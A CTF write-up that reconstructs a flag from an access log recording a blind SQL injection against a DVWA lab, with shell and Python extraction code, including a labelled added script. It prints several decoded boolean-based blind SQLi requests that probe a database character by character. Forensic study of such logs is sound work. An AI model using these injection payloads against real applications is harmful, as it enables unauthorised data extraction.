Log Analysis
0x0 Challenge
BugkuCTF Log Analysis
0x1 Analysis
```bash
head access.log
```
A quick look at the file shows a blind SQL injection run against the local host, and the log format is regular, so the rough plan is simply to match the format and extract the output.
```bash
cat access.log | grep flag > flag
```
Sure enough, the dvwa.flag_is_here field appears; after URL decoding it is obvious that this is a character-by-character brute force.
```python
from urllib import parse
import os

# Keep the requests that mention 'flag' and were not answered with 404,
# and take the quoted request field (the second "-delimited field)
os.system("cat access.log | grep flag | grep -v 404 | awk -F '\"' '{print $2}' > flag")
# URL-decode the extracted request lines into flag1
with open('flag1', 'w', encoding='utf-8') as f1:
    with open('flag', encoding='utf-8') as f2:
        while True:
            tmp = f2.read()
            if tmp:
                tmp = parse.unquote(tmp)
                f1.write(tmp)
            else:
                break
```
```text
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>64 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>96 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>100 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),1,1))>101 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),2,1))>96 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
GET /vulnerabilities/sqli_blind/?id=2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here ORDER BY flag LIMIT 0,1),2,1))>104 AND 'RCKM'='RCKM&Submit=Submit HTTP/1.1
......
```
0x2 Extracting the keys
The key is the character position (the second argument of MID), which is the fourth comma-separated field; the first line is skipped:
```bash
cat flag1 | awk -F ',' '{print $4}' | tail -n +2
```
0x3 Extracting the values
The value is the threshold after the `>` comparison:
```bash
cat flag1 | awk -F '>' '{print $2}' | awk -F ' ' '{print $1}'
```
0x4 Result
For each key (character position), take the highest value among the entries with that key and add 1; that is the decimal ASCII code of the brute-forced character, and converting it to the corresponding ASCII character gives the flag. This works because the 404 responses, the probes whose condition was false, were filtered out earlier, so the largest remaining threshold for a position is exactly one less than the character's code.
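The same procedure written out end to end, as an added example (not the author's script): it reproduces the shell filter, URL-decodes the request field, keeps the highest threshold per position in a dict, and applies the max+1 rule. The sample log lines, the `PROBE` regex and the function names are constructed for this example and are not from the challenge files.

```python
import re
from urllib.parse import quote, unquote

# Probe shape after URL decoding: "...LIMIT 0,1),<position>,1))><threshold> AND ..."
PROBE = re.compile(r"MID\(\(.*?\),(\d+),1\)\)>(\d+) AND ")

def probe_line(pos, threshold, status):
    """Constructed access-log line in the shape of the challenge log (not real data)."""
    sql = ("2' AND ORD(MID((SELECT IFNULL(CAST(flag AS CHAR),0x20) FROM dvwa.flag_is_here "
           f"ORDER BY flag LIMIT 0,1),{pos},1))>{threshold} AND 'RCKM'='RCKM")
    return ('127.0.0.1 - - [01/Jan/2020:00:00:00 +0800] "GET /vulnerabilities/sqli_blind/'
            f'?id={quote(sql)}&Submit=Submit HTTP/1.1" {status} 4000')

# Constructed sample log: position 1 is 'f' (102), position 2 is 'l' (108). DVWA's
# blind page answers a false condition with 404, so those lines are the false branch.
SAMPLE_LOG = "\n".join(
    ['127.0.0.1 - - [01/Jan/2020:00:00:00 +0800] "GET /index.php HTTP/1.1" 200 1024']
    + [probe_line(1, t, 200) for t in (64, 96, 100, 101)]
    + [probe_line(1, t, 404) for t in (104, 102)]
    + [probe_line(2, t, 200) for t in (96, 104, 106, 107)]
    + [probe_line(2, t, 404) for t in (112, 108)]
)

def decoded_requests(log_text):
    """Same filter as the shell pipeline: 'flag' lines not answered 404, request field URL-decoded."""
    out = []
    for line in log_text.splitlines():
        parts = line.split('"')  # parts[1] = request line, parts[2] starts with the status
        if "flag" not in line or len(parts) < 3 or parts[2].split()[0] == "404":
            continue
        out.append(unquote(parts[1]))
    return out

def max_threshold_per_position(requests):
    """Key = character position, value = the highest threshold whose '>' test held."""
    best = {}
    for req in requests:
        m = PROBE.search(req)
        if m:
            pos, thr = int(m.group(1)), int(m.group(2))
            best[pos] = max(best.get(pos, 0), thr)
    return best

def recover(log_text):
    """Each character is one more than the largest threshold it was proven greater than."""
    best = max_threshold_per_position(decoded_requests(log_text))
    return "".join(chr(best[p] + 1) for p in sorted(best))
```

Running `recover(SAMPLE_LOG)` on the constructed sample yields `"fl"`; on the real access.log the same function returns the full flag.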
Summary
I originally wanted to write a complete Python script that puts the keys and values into a dict, but after several attempts it didn't work out, and in the end I realised I'm just too bad at this... 🙁
This post is licensed under CC BY 4.0 by the author.